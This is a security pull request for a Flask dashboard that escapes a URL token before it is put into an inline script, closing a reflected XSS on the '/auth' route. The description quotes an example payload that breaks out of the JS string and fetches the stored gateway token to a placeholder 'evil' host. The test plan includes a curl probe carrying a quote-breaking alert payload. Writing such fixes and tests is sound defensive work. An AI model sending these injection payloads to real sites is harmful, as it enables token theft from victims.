### PR TITLE
fix(security): escape token in /auth endpoint to prevent XSS (dumko2001/#511)

### DIFF
--- a/routes/meta.py
+++ b/routes/meta.py
@@ -30,6 +30,7 @@ Flask app, not a Blueprint, so it stays in ``dashboard.py``.
 Pure mechanical move — zero behaviour change.
 """
 
+import html
 import json
 import os
 import sys
@@ -317,12 +318,18 @@ def auth_token():
             "<h2>Missing token</h2><p>Usage: <code>/auth?token=YOUR_TOKEN</code></p></body></html>",
             400,
         )
+    # Escape token before JS interpolation. html.escape with quote=True converts
+    # ' and " to &#x27; / &quot; which break out of the JS string-literal
+    # context inside <script>...</script> (the browser does NOT decode HTML
+    # entities inside raw <script> content, so the escaped form is just inert
+    # literal characters). Originally reported by @dumko2001 in #511.
+    escaped = html.escape(token, quote=True)
     return f"""<!DOCTYPE html><html><head><meta charset="utf-8"></head>
 <body style="background:#0b0f1a;color:#e2e8f0;font-family:sans-serif;padding:40px;min-height:100vh;">
 <p>Authenticating...</p>
 <script>
-  localStorage.setItem('clawmetry-token', '{token}');
-  localStorage.setItem('clawmetry-gw-token', '{token}');
+  localStorage.setItem('clawmetry-token', '{escaped}');
+  localStorage.setItem('clawmetry-gw-token', '{escaped}');
   window.location.href = '/';
 </script>
 </body></html>"""


### PR DESCRIPTION
## Summary
- The `/auth?token=…` route interpolates the token directly into a JS string literal inside `<script>`. An attacker could send `/auth?token='; fetch('https://evil/?'+localStorage.getItem('clawmetry-token')); //` to exfiltrate the gateway token after a victim clicks the link.
- Fix: `html.escape(token, quote=True)` before interpolation. Inside `<script>` the browser does not decode HTML entities, so the escaped form is inert literal text and the JS string remains correctly terminated.
- Originally reported + fixed by @dumko2001 in #511; that PR was conflicting against current main (the auth route moved from `dashboard.py` to `routes/meta.py` during the routes/ split). Rebased here with attribution preserved.

## Test plan
- [ ] `curl 'http://localhost:8900/auth?token=test%27;alert(1);//'` — body should contain `&#x27;` not raw quote
- [ ] Normal token flow still works: `/auth?token=GATEWAY_TOKEN` → localStorage populated → redirect to /

Co-authored-by: dumko2001 <dumko.raj@gmail.com>